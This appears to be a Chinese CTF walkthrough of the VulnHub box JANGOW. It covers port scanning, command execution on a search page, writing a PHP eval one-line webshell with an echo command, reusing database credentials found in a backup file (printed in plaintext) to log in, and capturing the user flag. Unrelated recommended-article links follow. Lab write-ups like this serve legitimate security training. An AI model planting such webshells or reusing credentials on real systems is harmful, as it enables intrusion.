VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
小比特_蓝光11 分钟前
匿名管道+进程池
linux
江华森12 分钟前
exp01_Python_数据类型
开发语言·python
大鱼>32 分钟前
模型可解释性:特征重要性/SHAP/LIME
人工智能·python·机器学习·lstm
代码不接地38 分钟前
【时间序列预测】0.时间序列任务知识地图
python·ai编程
BS_Li1 小时前
【Linux网络编程】NAT、代理服务、内网穿透
linux·网络·智能路由器
许彰午1 小时前
77_Python数据清洗实战技巧
开发语言·python
Sam09271 小时前
【AI 算法精讲 16】BPE 分词:从字节对到子词
人工智能·python·算法·ai
Thomas.Chan2 小时前
数据中心动环监控系统架构详解
运维·网络·计算机网络·其他·系统架构·数据中心
江华森2 小时前
04-python-面向对象
开发语言·python